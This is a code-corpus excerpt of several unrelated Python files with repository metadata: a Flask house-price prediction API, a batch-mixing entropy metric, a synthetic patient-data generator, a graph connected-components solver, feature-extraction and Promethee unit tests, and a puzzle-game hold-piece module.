a34991845be5613841f0b124224655a27cd95755
| 1,732
|
py
|
Python
|
app.py
|
u-aaa/House-_prediction_model
|
4808b4aefb802520a7ccd878c342699093e6942d
|
[
"MIT"
] | null | null | null |
app.py
|
u-aaa/House-_prediction_model
|
4808b4aefb802520a7ccd878c342699093e6942d
|
[
"MIT"
] | null | null | null |
app.py
|
u-aaa/House-_prediction_model
|
4808b4aefb802520a7ccd878c342699093e6942d
|
[
"MIT"
] | 1
|
2021-09-23T19:42:36.000Z
|
2021-09-23T19:42:36.000Z
|
import pickle
import json
import numpy as np
from flask import Flask, request, jsonify
app = Flask(__name__)

# Load the trained regression model once at import time; `model` is shared
# by all requests.
with open('models/regressor.pkl', 'rb') as f:
    model = pickle.load(f)
def __process_input(posted_data) -> np.array:
    '''
    Transform a JSON request body into the 2-D feature array the model
    understands, or None when the payload is malformed.
    :param posted_data: raw JSON bytes/string with a 'features' key
    :return: np.array of shape (n_samples, 13), or None
    '''
    try:
        payload = json.loads(posted_data)
        features = np.array(payload['features'])
        # Reject anything deeper than a 2-D sample matrix.
        if features.ndim > 2:
            return None
        # Promote a single 1-D sample to a one-row matrix.
        if features.ndim == 1:
            features = features.reshape(1, -1)
        # The model was trained on exactly 13 features per sample.
        if features.shape[-1] == 13:
            return features
        return None
    except (KeyError, json.JSONDecodeError, AssertionError):
        return None
@app.route('/')
def index() -> str:
    """Landing page: a greeting plus an explicit HTTP 200."""
    greeting = 'Welcome to the house prediction interface'
    return greeting, 200
@app.route('/predict', methods=['POST'])
def predict() -> (str, int):
    '''
    Feed the posted request data to the model and return the predicted
    value(s) as JSON.
    :return: (json body, http status)
    '''
    try:
        features = __process_input(request.data)
        # Guard clause: malformed payloads get a 400 straight away.
        if features is None:
            return json.dumps({'Error': 'Invalid input'}), 400
        prediction = model.predict(features)
        return json.dumps({'predicted house price(s) (in dollars)': prediction.tolist()}), 200
    except (KeyError, json.JSONDecodeError, AssertionError):
        return json.dumps({'Error': 'Unable to predict'}), 500
# Run the Flask development server when executed directly.
if __name__ == '__main__':
    app.run()
| 28.393443
| 105
| 0.639723
| 222
| 1,732
| 4.815315
| 0.414414
| 0.052385
| 0.042095
| 0.043031
| 0.130964
| 0.099158
| 0
| 0
| 0
| 0
| 0
| 0.016204
| 0.251732
| 1,732
| 60
| 106
| 28.866667
| 0.808642
| 0.15127
| 0
| 0.179487
| 0
| 0
| 0.11843
| 0
| 0
| 0
| 0
| 0
| 0.051282
| 1
| 0.076923
| false
| 0
| 0.102564
| 0.025641
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a34d2a23f38ff576e6a5ef0f805165729d2fc6ef
| 2,789
|
py
|
Python
|
scalex/metrics.py
|
jsxlei/SCALEX
|
021c6d35a0cebeaa1f59ea53b9b9e22015ce6e5f
|
[
"MIT"
] | 11
|
2021-04-09T02:46:29.000Z
|
2022-01-04T16:42:44.000Z
|
scale/metrics.py
|
QingZhan98/SCALE_v2
|
69bb02beee40ec085684335f356798d4dcb53fbc
|
[
"MIT"
] | 2
|
2021-04-18T02:30:18.000Z
|
2022-03-05T10:40:00.000Z
|
scale/metrics.py
|
QingZhan98/SCALE_v2
|
69bb02beee40ec085684335f356798d4dcb53fbc
|
[
"MIT"
] | 4
|
2021-03-29T12:34:47.000Z
|
2022-03-06T12:42:45.000Z
|
#!/usr/bin/env python
"""
# Author: Xiong Lei
# Created Time : Thu 10 Jan 2019 07:38:10 PM CST
# File Name: metrics.py
# Description:
"""
import numpy as np
import scipy
from sklearn.neighbors import NearestNeighbors, KNeighborsRegressor
def batch_entropy_mixing_score(data, batches, n_neighbors=100, n_pools=100, n_samples_per_pool=100):
    """
    Calculate batch entropy mixing score

    Algorithm
    -----
        * 1. Calculate the regional mixing entropies at the location of 100 randomly chosen cells from all batches
        * 2. Define 100 nearest neighbors for each randomly chosen cell
        * 3. Calculate the mean mixing entropy as the mean of the regional entropies
        * 4. Repeat above procedure for 100 iterations with different randomly chosen cells.

    Parameters
    ----------
    data
        np.array of shape nsamples x nfeatures.
    batches
        batch labels of nsamples.
    n_neighbors
        The number of nearest neighbors for each randomly chosen cell. By default, n_neighbors=100.
    n_samples_per_pool
        The number of randomly chosen cells from all batches per iteration. By default, n_samples_per_pool=100.
    n_pools
        The number of iterations with different randomly chosen cells. By default, n_pools=100.

    Returns
    -------
    Batch entropy mixing score
    """
    # print("Start calculating Entropy mixing score")
    def entropy(batches):
        # Regional mixing entropy of one neighborhood: local batch
        # frequencies p are re-weighted by the global proportions P so that
        # unbalanced batch sizes do not dominate the score.
        p = np.zeros(N_batches)
        adapt_p = np.zeros(N_batches)
        a = 0
        for i in range(N_batches):
            p[i] = np.mean(batches == batches_[i])
            a = a + p[i]/P[i]
        entropy = 0
        for i in range(N_batches):
            adapt_p[i] = (p[i]/P[i])/a
            # 10**-8 guards against log(0) for batches absent locally.
            entropy = entropy - adapt_p[i]*np.log(adapt_p[i]+10**-8)
        return entropy

    # Cap the neighborhood size for very small datasets.
    n_neighbors = min(n_neighbors, len(data) - 1)
    # NOTE(review): n_jobs=8 is hard-coded — presumably tuned for the
    # authors' machine; confirm before changing.
    nne = NearestNeighbors(n_neighbors=1 + n_neighbors, n_jobs=8)
    nne.fit(data)
    # kNN graph without self-edges (identity subtracted).
    kmatrix = nne.kneighbors_graph(data) - scipy.sparse.identity(data.shape[0])
    score = 0
    batches_ = np.unique(batches)
    N_batches = len(batches_)
    if N_batches < 2:
        raise ValueError("Should be more than one cluster for batch mixing")
    # Global batch proportions, used by entropy() above.
    P = np.zeros(N_batches)
    for i in range(N_batches):
        P[i] = np.mean(batches == batches_[i])
    for t in range(n_pools):
        # Random pool of cells; average the entropy of each cell's
        # neighborhood (the nonzero columns of its kNN-graph row).
        indices = np.random.choice(np.arange(data.shape[0]), size=n_samples_per_pool)
        score += np.mean([entropy(batches[kmatrix[indices].nonzero()[1]
                                          [kmatrix[indices].nonzero()[0] == i]])
                          for i in range(n_samples_per_pool)])
    Score = score / float(n_pools)
    # Normalize by log2(N_batches) so a perfectly mixed result scores ~1.
    return Score / float(np.log2(N_batches))
from sklearn.metrics import silhouette_score
| 34.8625
| 114
| 0.639656
| 391
| 2,789
| 4.434783
| 0.329923
| 0.041522
| 0.031719
| 0.043253
| 0.284314
| 0.194348
| 0.107843
| 0.048443
| 0.048443
| 0.048443
| 0
| 0.028238
| 0.263535
| 2,789
| 80
| 115
| 34.8625
| 0.815969
| 0.38616
| 0
| 0.083333
| 0
| 0
| 0.030151
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.111111
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a34e461868bd92e65252352e4554823a69ea35c7
| 2,603
|
py
|
Python
|
examples/data/create_data.py
|
fdabek1/EHR-Functions
|
e6bd0b6fa213930358c4a19be31c459ac7430ca9
|
[
"MIT"
] | null | null | null |
examples/data/create_data.py
|
fdabek1/EHR-Functions
|
e6bd0b6fa213930358c4a19be31c459ac7430ca9
|
[
"MIT"
] | null | null | null |
examples/data/create_data.py
|
fdabek1/EHR-Functions
|
e6bd0b6fa213930358c4a19be31c459ac7430ca9
|
[
"MIT"
] | null | null | null |
import pandas as pd
import random
import time
# Source: https://stackoverflow.com/a/553320/556935
def str_time_prop(start, end, date_format, prop):
    """Get a time at a proportion of a range of two formatted times.

    start and end are strings in `date_format` (strftime-style) bounding
    the interval [start, end]; prop is the fraction of that interval to
    advance past start. The result is formatted with the same format.
    """
    t0 = time.mktime(time.strptime(start, date_format))
    t1 = time.mktime(time.strptime(end, date_format))
    sampled = t0 + prop * (t1 - t0)
    return time.strftime(date_format, time.localtime(sampled))
def random_date(start, end):
    """Return a uniformly random MM/DD/YYYY date between start and end."""
    fraction = random.random()
    return str_time_prop(start, end, '%m/%d/%Y', fraction)
def basic(n=1000):
    """Write basic.csv with n synthetic patient rows.

    Columns: sequential PatientID, random age 18-100, gender M/F and
    category A/B/C.
    """
    records = {
        'PatientID': [],
        'PatientAge': [],
        'PatientGender': [],
        'PatientCategory': [],
    }
    for patient_id in range(1, n + 1):
        records['PatientID'].append(patient_id)
        records['PatientAge'].append(random.randint(18, 100))
        records['PatientGender'].append(random.choice(['M', 'F']))
        records['PatientCategory'].append(random.choice(['A', 'B', 'C']))
    pd.DataFrame(records).to_csv('basic.csv', index=False)
def encounters(n=1000):
    """Write encounters.csv: 2-15 visits per patient dated 2015-2019.

    Each row repeats the patient's demographics with the age advanced by
    the encounter year, plus three random two-letter diagnosis codes.
    """
    records = {
        'PatientID': [],
        'PatientAge': [],
        'PatientGender': [],
        'PatientCategory': [],
        'EncounterDate': [],
        'Diagnosis1': [],
        'Diagnosis2': [],
        'Diagnosis3': [],
    }
    for patient_id in range(1, n + 1):
        age = random.randint(18, 100)
        gender = random.choice(['M', 'F'])
        category = random.choice(['A', 'B', 'C'])
        for _ in range(random.randint(2, 15)):  # random number of encounters
            date = random_date('01/01/2015', '12/31/2019')
            year = int(date[-4:])
            records['PatientID'].append(patient_id)
            # Age grows with the encounter year relative to 2015.
            records['PatientAge'].append(age + (year - 2015))
            records['PatientGender'].append(gender)
            records['PatientCategory'].append(category)
            records['EncounterDate'].append(date)
            records['Diagnosis1'].append(random.choice(['A', 'B', 'C']) + random.choice(['A', 'B', 'C']))
            records['Diagnosis2'].append(random.choice(['A', 'B', 'C']) + random.choice(['A', 'B', 'C']))
            records['Diagnosis3'].append(random.choice(['A', 'B', 'C']) + random.choice(['A', 'B', 'C']))
    df = pd.DataFrame(records)
    df.to_csv('encounters.csv', index=False)
# Generate both CSVs with a fixed seed so the output is reproducible.
if __name__ == '__main__':
    random.seed(3)
    basic()
    encounters()
| 31.743902
| 102
| 0.579332
| 317
| 2,603
| 4.690852
| 0.340694
| 0.080699
| 0.069939
| 0.075319
| 0.308003
| 0.27236
| 0.268325
| 0.120377
| 0.120377
| 0.120377
| 0
| 0.032945
| 0.242028
| 2,603
| 81
| 103
| 32.135802
| 0.72073
| 0.151748
| 0
| 0.285714
| 0
| 0
| 0.165596
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.053571
| 0.017857
| 0.160714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a350ecde028977958b337223398f9351c3e4bbec
| 1,317
|
py
|
Python
|
contests/ccpc20qhd/f超时.py
|
yofn/pyacm
|
e573f8fdeea77513711f00c42f128795cbba65a6
|
[
"Apache-2.0"
] | null | null | null |
contests/ccpc20qhd/f超时.py
|
yofn/pyacm
|
e573f8fdeea77513711f00c42f128795cbba65a6
|
[
"Apache-2.0"
] | null | null | null |
contests/ccpc20qhd/f超时.py
|
yofn/pyacm
|
e573f8fdeea77513711f00c42f128795cbba65a6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
'''
#ccpc20qhd-f => 最大联通子图
#如果都是联通的,所有节点都要放进去,
#友好值=联通子图中边的个数-点的个数
#应该所有(友好值>0)联通子图加起来?
#DFS搜索,或者是并查集? 数一数有多少联通块?
#最短路用广搜,全部解用深搜
连通图的复杂度是O(V+E)..
为什么会Runtime Error?
分析:
解法1: DFS做联通块
解法2: 看不包含哪些人,相当于走个捷径!
'''
def f(n, l):
    """Sum of max(0, edges - nodes) over the connected components of an
    undirected multigraph ("friendliness value" of the contest problem).

    n -- number of nodes (edges use 1-based labels)
    l -- list of (x, y) edge pairs; parallel edges allowed, any order
    """
    # Store each edge only once, from its smaller endpoint to the bigger
    # one, so the DFS below counts every edge exactly once.
    adj = [[] for _ in range(n)]
    for x, y in l:
        if x > y:
            x, y = y, x
        adj[x - 1].append(y - 1)
    visited = [False] * n
    total = 0
    # FIX: removed a stray debug `print(el)` that corrupted the solution's
    # output on the judge.
    for start in range(n):
        if visited[start]:
            continue
        # Iterative DFS over the component containing `start`.
        # FIX: dynamic stack instead of a fixed [0]*n buffer, which could
        # overflow when a node is pushed more than once (parallel edges).
        stack = [start]
        nodes = 0
        edges = 0
        while stack:
            node = stack.pop()
            if visited[node]:
                continue
            visited[node] = True
            nodes += 1
            # All stored edges of `node` are seen here exactly once.
            edges += len(adj[node])
            for neighbor in adj[node]:
                if not visited[neighbor]:
                    stack.append(neighbor)
        total += max(0, edges - nodes)
    return total
# Driver: read t test cases; each case gives "n m" (nodes, edges) followed
# by m lines of edge endpoints, then prints the per-case answer.
t = int(input())
for i in range(t):
    n, m = list(map(int, input().split()))
    l = [list(map(int, input().split())) for _ in range(m)]
    print('Case #%d: %s' % ((i+1), f(n, l)))
| 23.105263
| 82
| 0.430524
| 189
| 1,317
| 2.989418
| 0.486772
| 0.049558
| 0.010619
| 0.038938
| 0.070796
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026385
| 0.42445
| 1,317
| 56
| 83
| 23.517857
| 0.718997
| 0.274108
| 0
| 0.055556
| 0
| 0
| 0.01278
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0
| 0
| 0.055556
| 0.055556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3525d2e36b057b387fd2a242a0be1258c2a7481
| 2,920
|
py
|
Python
|
test/feature_extraction/list_counter_test.py
|
tmhatton/MLinPractice
|
759706e13181cec864d6aa8ece9ae7042f083e4c
|
[
"MIT"
] | null | null | null |
test/feature_extraction/list_counter_test.py
|
tmhatton/MLinPractice
|
759706e13181cec864d6aa8ece9ae7042f083e4c
|
[
"MIT"
] | 1
|
2021-10-19T08:09:44.000Z
|
2021-10-19T08:09:44.000Z
|
test/feature_extraction/list_counter_test.py
|
tmhatton/MLinPractice
|
759706e13181cec864d6aa8ece9ae7042f083e4c
|
[
"MIT"
] | null | null | null |
import unittest
import pandas as pd
from code.feature_extraction.list_counter import PhotosNum, URLsNum, HashtagNum, MentionNum, TokenNum
from code.util import COLUMN_PHOTOS, COLUMN_URLS, COLUMN_HASHTAGS, COLUMN_MENTIONS
class PhotosNumTest(unittest.TestCase):
    """PhotosNum should count the photo URLs stored in the photos column."""

    def setUp(self) -> None:
        # Extractor under test, wired to the photos column.
        self.INPUT_COLUMN = COLUMN_PHOTOS
        self.extractor = PhotosNum(self.INPUT_COLUMN)

    def test_photos_num(self):
        # Three photo URLs, serialized the way the raw data stores them.
        raw_value = '''['www.hashtag.de/234234.jpg', 'www.yolo.us/g5h23g45f.png', 'www.data.it/246gkjnbvh2.jpg']'''
        frame = pd.DataFrame([COLUMN_PHOTOS])
        frame[COLUMN_PHOTOS] = [raw_value]
        self.assertEqual([3], self.extractor.fit_transform(frame))
class URLsNumTest(unittest.TestCase):
    """URLsNum should count the URLs stored in the urls column."""

    def setUp(self) -> None:
        self.INPUT_COLUMN = COLUMN_URLS
        self.extractor = URLsNum(self.INPUT_COLUMN)

    def test_url_num(self):
        # Four URLs, serialized the way the raw data stores them.
        raw_value = '''['www.google.com', 'www.apple.com', 'www.uos.de', 'www.example.com']'''
        frame = pd.DataFrame([COLUMN_URLS])
        frame[COLUMN_URLS] = [raw_value]
        self.assertEqual([4], self.extractor.fit_transform(frame))
class HashtagNumTest(unittest.TestCase):
    """HashtagNum should count the hashtags stored in the hashtags column."""

    def setUp(self) -> None:
        self.INPUT_COLUMN = COLUMN_HASHTAGS
        self.extractor = HashtagNum(self.INPUT_COLUMN)

    def test_hashtag_num(self):
        # Three hashtags, serialized the way the raw data stores them.
        raw_value = '''['hashtag', 'yolo', 'data']'''
        frame = pd.DataFrame([COLUMN_HASHTAGS])
        frame[COLUMN_HASHTAGS] = [raw_value]
        self.assertEqual([3], self.extractor.fit_transform(frame))
class MentionNumTest(unittest.TestCase):
    """MentionNum should count the user mentions in the mentions column."""

    def setUp(self) -> None:
        self.INPUT_COLUMN = COLUMN_MENTIONS
        self.extractor = MentionNum(self.INPUT_COLUMN)

    def test_mention_num(self):
        # Two mention dicts, serialized the way the raw data stores them.
        raw_value = '''[{'id': '2235729541', 'name': 'dogecoin', 'screen_name': 'dogecoin'}, {'id': '123432342', 'name': 'John Doe', 'screen_name': 'jodoe'}]'''
        frame = pd.DataFrame([COLUMN_MENTIONS])
        frame[COLUMN_MENTIONS] = [raw_value]
        self.assertEqual([2], self.extractor.fit_transform(frame))
class TokenNumTest(unittest.TestCase):
    """TokenNum should count the tokens in a tokenized text column."""

    def setUp(self) -> None:
        self.INPUT_COLUMN = "input"
        self.extractor = TokenNum(self.INPUT_COLUMN)

    def test_token_length(self):
        # Five tokens, serialized the way the raw data stores them.
        tokens_repr = "['This', 'is', 'an', 'example', 'sentence']"
        frame = pd.DataFrame()
        frame[self.INPUT_COLUMN] = [tokens_repr]
        self.assertEqual([5], self.extractor.fit_transform(frame))
# Run the test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
| 30.736842
| 161
| 0.667466
| 348
| 2,920
| 5.344828
| 0.244253
| 0.077419
| 0.08871
| 0.064516
| 0.489247
| 0.358065
| 0.358065
| 0.358065
| 0.332796
| 0.307527
| 0
| 0.016818
| 0.205822
| 2,920
| 94
| 162
| 31.06383
| 0.785252
| 0
| 0
| 0.245902
| 0
| 0.04918
| 0.128082
| 0.029795
| 0
| 0
| 0
| 0
| 0.081967
| 1
| 0.163934
| false
| 0
| 0.065574
| 0
| 0.311475
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a352f55dcd4b6a9dcf2653a39663d590b4d79e27
| 926
|
py
|
Python
|
tests/test_2_promethee.py
|
qanastek/EasyMCDM
|
7fa2e2dfe9397834ca9f50211ea2717a16785394
|
[
"MIT"
] | 4
|
2022-03-05T20:51:38.000Z
|
2022-03-15T17:10:22.000Z
|
tests/test_2_promethee.py
|
qanastek/EasyMCDM
|
7fa2e2dfe9397834ca9f50211ea2717a16785394
|
[
"MIT"
] | null | null | null |
tests/test_2_promethee.py
|
qanastek/EasyMCDM
|
7fa2e2dfe9397834ca9f50211ea2717a16785394
|
[
"MIT"
] | 1
|
2022-03-08T13:45:22.000Z
|
2022-03-08T13:45:22.000Z
|
import unittest
from operator import index
from EasyMCDM.models.Promethee import Promethee
class TestPrometheeMethods(unittest.TestCase):
    """Regression test for the Promethee solver on the sample CSV data."""

    def test_str_str_str(self):
        csv_path = "data/partiels_donnees.csv"
        solver = Promethee(data=csv_path, verbose=False)
        result = solver.solve(
            weights=[0.3, 0.2, 0.2, 0.1, 0.2],
            prefs=["min", "min", "max", "max", "max"]
        )
        # Expected flows are pinned exactly (including float-arithmetic
        # noise) so any numeric drift in the solver is caught.
        assert result["phi_negative"] == [('A', 0.8), ('C', 1.4000000000000001), ('D', 1.7), ('E', 2.4), ('B', 3.0999999999999996)], "Phi Negative are differents!"
        assert result["phi_positive"] == [('A', 3.0), ('C', 2.2), ('D', 1.9), ('E', 1.4000000000000001), ('B', 0.9)], "Phi positive are differents!"
        assert result["phi"] == [('A', 2.2), ('C', 0.8), ('D', 0.19999999999999996), ('E', -0.9999999999999998), ('B', -2.1999999999999997)], "Phi are differents!"
# Run the test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
| 42.090909
| 161
| 0.565875
| 125
| 926
| 4.08
| 0.44
| 0.011765
| 0.070588
| 0.086275
| 0.098039
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180441
| 0.215983
| 926
| 22
| 162
| 42.090909
| 0.522039
| 0
| 0
| 0
| 0
| 0
| 0.182119
| 0.027594
| 0
| 0
| 0
| 0
| 0.1875
| 1
| 0.0625
| false
| 0
| 0.1875
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3552615d55b8131f79fc858dd41da8c30cf2d71
| 6,028
|
py
|
Python
|
Source/game/systems/puzzle/hold.py
|
LucXyMan/starseeker
|
b5c3365514c982734da7d95621e6b85af550ce82
|
[
"BSD-3-Clause"
] | null | null | null |
Source/game/systems/puzzle/hold.py
|
LucXyMan/starseeker
|
b5c3365514c982734da7d95621e6b85af550ce82
|
[
"BSD-3-Clause"
] | null | null | null |
Source/game/systems/puzzle/hold.py
|
LucXyMan/starseeker
|
b5c3365514c982734da7d95621e6b85af550ce82
|
[
"BSD-3-Clause"
] | 1
|
2019-11-27T18:00:00.000Z
|
2019-11-27T18:00:00.000Z
|
#!/usr/bin/env python2.7
# -*- coding:UTF-8 -*-2
u"""hold.py
Copyright (c) 2019 Yukio Kuro
This software is released under BSD license.
ホールドピース管理モジュール。
"""
import pieces as _pieces
import utils.const as _const
import utils.layouter as _layouter
class Hold(object):
    u"""Hold-piece manager: stores a piece set aside by the player and
    swaps it back into play on request.
    """
    __slots__ = (
        "__id", "__item_state", "__is_captured", "__keep", "__piece",
        "__system", "__window")
    # "#"-joined name lists used to classify blocks inside a held pattern.
    __GOOD_ITEM_NAMES = (
        _const.STAR_NAMES+"#"+_const.SHARD_NAMES+"#" +
        _const.KEY_NAMES+"#"+_const.CHEST_NAMES+"#Maxwell")
    __BAD_ITEM_NAMES = (
        _const.IRREGULAR_NAMES+"#"+_const.DEMON_NAMES+"#" +
        _const.GHOST_NAMES+"#Pandora#Joker")

    def __init__(self, system):
        u"""Constructor.
        self.__id: used to decide this object's screen position.
        self.__keep: holds the hold-piece pattern.
        """
        import pygame as __pygame
        import window as __window
        self.__system = system
        self.__id = self.__system.id
        self.__piece = None
        self.__keep = _pieces.Array(length=2)
        self.__window = __window.Next(__pygame.Rect(
            (0, 0), _const.NEXT_WINDOW_SIZE))
        self.__is_captured = False
        self.__item_state = 0b0000
        # Window is lit while no piece has been captured this turn.
        self.__window.is_light = not self.__is_captured
        _layouter.Game.set_hold(self.__window, self.__id)

    def __display(self):
        u"""Show the held piece in the hold window.
        """
        self.__piece = _pieces.Falling(self.__keep[0], (0, 0))
        self.__window.piece = self.__piece

    def __set_item_state(self):
        u"""Set the state bits from the items inside the held pattern.
        0b0001: a hold block exists.
        0b0010: a basic block exists.
        0b0100: a benign item exists.
        0b1000: a malign item exists.
        """
        pattern, = self.__keep
        self.__item_state = (
            0b0001+(any(any(
                shape and shape.type in _const.BASIC_NAMES.split("#") for
                shape in line) for line in pattern) << 1) +
            (any(any(
                shape and shape.type in self.__GOOD_ITEM_NAMES.split("#") for
                shape in line) for line in pattern) << 2) +
            (any(any(
                shape and shape.type in self.__BAD_ITEM_NAMES.split("#") for
                shape in line) for line in pattern) << 3))

    def change(self, is_single, target):
        u"""Change blocks in the held pattern.

        target is "new##old"; the change is skipped when the player's armor
        or group prevents the new block type.
        """
        if not self.__keep.is_empty:
            new, old = target.split("##")
            self.__piece.clear()
            if self.__system.battle.player.armor.is_prevention(new):
                _, _, armor, _ = self.__system.battle.equip_huds
                armor.flash()
            elif not self.__system.battle.group.is_prevention(new):
                pattern, = self.__keep
                if is_single:
                    pattern.append(new, old)
                else:
                    pattern.change(new, old)
            # NOTE(review): indentation reconstructed — assumed the state
            # refresh runs whenever the hold is non-empty; confirm upstream.
            self.__set_item_state()
            self.__display()

    def capture(self):
        u"""Capture or exchange the current falling piece.
        """
        import material.sound as __sound

        def __accessory_effect():
            u"""Apply the player's accessory effect to the held pattern.
            """
            battle = self.__system.battle
            effect = battle.player.accessory.spell
            if effect:
                is_single, new, old = effect
                _, _, armor, accessory = battle.equip_huds
                if battle.player.armor.is_prevention(new):
                    armor.flash()
                elif not battle.group.is_prevention(new) and (
                    self.__keep[-1].append(new, old) if is_single else
                    self.__keep[-1].change(new, old)
                ):
                    accessory.flash()

        def __update():
            u"""Refresh capture flag, item state and display.
            """
            self.is_captured = True
            self.__set_item_state()
            self.__display()

        # Only one capture is allowed per turn.
        if not self.__is_captured:
            __sound.SE.play("hold")
            puzzle = self.__system.puzzle
            if self.__keep.is_empty:
                # Nothing held yet: stash the current piece and advance.
                puzzle.piece.pattern.rotate(0)
                self.__keep.append(puzzle.piece.pattern)
                __accessory_effect()
                puzzle.piece.clear()
                puzzle.forward()
                __update()
            else:
                # Swap: only when the held piece fits at the current spot.
                virtual = self.virtual
                virtual.topleft = puzzle.piece.state.topleft
                if not virtual.is_collide(puzzle.field):
                    self.__piece.clear()
                    puzzle.piece.clear()
                    puzzle.piece.pattern.rotate(0)
                    self.__keep.append(puzzle.piece.pattern)
                    __accessory_effect()
                    puzzle.piece.pattern = self.__keep.pop()
                    puzzle.update()
                    __update()

    def exchange(self, other):
        u"""Exchange held pieces with another Hold.
        """
        if not self.__keep.is_empty and not other.__keep.is_empty:
            self.__piece.clear()
            other.__piece.clear()
            pattern, = self.__keep
            other_pattern, = other.__keep
            self.__keep[0] = other_pattern
            other.__keep[0] = pattern
            self.__set_item_state()
            other.__set_item_state()
            self.__display()
            other.__display()

    @property
    def virtual(self):
        u"""Get a virtual copy of the held piece for collision checks.
        """
        if not self.__keep.is_empty:
            pattern, = self.__keep
            return _pieces.Falling(pattern, is_virtual=True)

    @property
    def is_empty(self):
        u"""True when nothing is held.
        """
        return self.__keep.is_empty

    @property
    def is_captured(self):
        u"""True when a capture already happened this turn.
        """
        return self.__is_captured

    @is_captured.setter
    def is_captured(self, value):
        u"""Set the capture flag.
        Also updates the window tint to match.
        """
        self.__is_captured = value
        self.__window.is_light = not self.__is_captured

    @property
    def item_state(self):
        u"""Get the item-state bits (see __set_item_state).
        """
        return self.__item_state

    @property
    def window(self):
        u"""Get the hold window.
        """
        return self.__window
| 31.233161
| 77
| 0.535169
| 637
| 6,028
| 4.638933
| 0.246468
| 0.048731
| 0.033164
| 0.025381
| 0.239594
| 0.214213
| 0.175635
| 0.142132
| 0.099492
| 0.099492
| 0
| 0.013656
| 0.356171
| 6,028
| 192
| 78
| 31.395833
| 0.747488
| 0.092236
| 0
| 0.260274
| 0
| 0
| 0.017716
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09589
| false
| 0
| 0.041096
| 0
| 0.19863
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|